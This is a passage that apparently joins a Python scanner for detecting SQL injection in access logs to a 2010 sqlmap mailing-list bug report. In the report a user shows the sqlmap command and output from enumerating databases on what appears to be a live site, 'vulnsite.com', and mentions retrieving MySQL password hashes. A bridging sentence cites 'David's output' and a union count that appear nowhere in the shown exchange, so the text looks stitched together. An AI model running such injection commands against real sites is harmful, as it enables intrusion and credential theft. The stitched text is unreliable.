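            "tautology": bool(TAUTOLOGY_RE.search(value)),
            "row_offset": int(top.group(1)) if top else None,
        }
    return None

def scan_log(text):
    """Analyse every request line of an access log; findings keep log order."""
    targets = (m.group("target") for m in map(REQ_RE.search, text.splitlines()) if m)
    return [f for f in map(analyse_target, targets) if f]
```

The union column count (6 here) and the constant delimiter pair within a run are what let an analyst match the "resuming union count 6" and the per-run CHAR() strings in David's output against the server's own log.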
From: Bernardo D. A. G. <ber...@gm...> - 2010-03-18 09:46:25
Brandon,

I can't reproduce it; it works just fine for me. Can you please provide us with the full output with -v 5? Also, try with --threads and without, from the latest version in the subversion repository.

Regards,
Bernardo

On Wed, Mar 17, 2010 at 18:47, Brandon <bmu...@gm...> wrote:
> Well, there is a bug when retrieving the databases. When retrieving the databases it tends to retrieve the wrong characters. This bug also occurs when retrieving the mysql passwords. The program has spaces in some of the hashes as well as "@" in 1 of the passwords. I am on Windows XP Pro SP3. Here is an example of retrieving one of the wrong characters in the DB name. Mind you, .7 worked without any issues grabbing DBs and grabbing mysql passwords.
>
> C:\sqlmap8>sqlmap -u vulnsite.com/sites.php?site_id=130 --dbs
>
> sqlmap/0.8 - automatic SQL injection and database takeover tool
> http://sqlmap.sourceforge.net
>
> [*] starting at: 13:31:01
>
> [13:31:01] [INFO] using 'C:\sqlmap8\output\vulnsite.com\session' as session file
> [13:31:01] [INFO] resuming match ratio '0.968' from session file
> [13:31:01] [INFO] resuming injection point 'GET' from session file
> [13:31:01] [INFO] resuming injection parameter 'site_id' from session file
> [13:31:01] [INFO] resuming injection type 'numeric' from session file
> [13:31:01] [INFO] resuming 0 number of parenthesis from session file
> [13:31:01] [INFO] resuming back-end DBMS 'mysql 5' from session file
> [13:31:01] [INFO] testing connection to the target url
> [13:31:05] [INFO] testing for parenthesis on injectable parameter
> [13:31:05] [INFO] the back-end DBMS is MySQL
> web server operating system: Linux Fedora 5 (Bordeaux)
> web application technology: Apache 2.2.0, PHP 5.2.1
> back-end DBMS: MySQL 5
>
> [13:31:05] [INFO] fetching database names
> [13:31:05] [INFO] fetching number of databases
> [13:31:05] [INFO] retrieved: 21
> [13:33:01] [INFO] retrieved: informa`ion_schema
>
> Thanks

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
PGP Key ID: 0x05F5A30F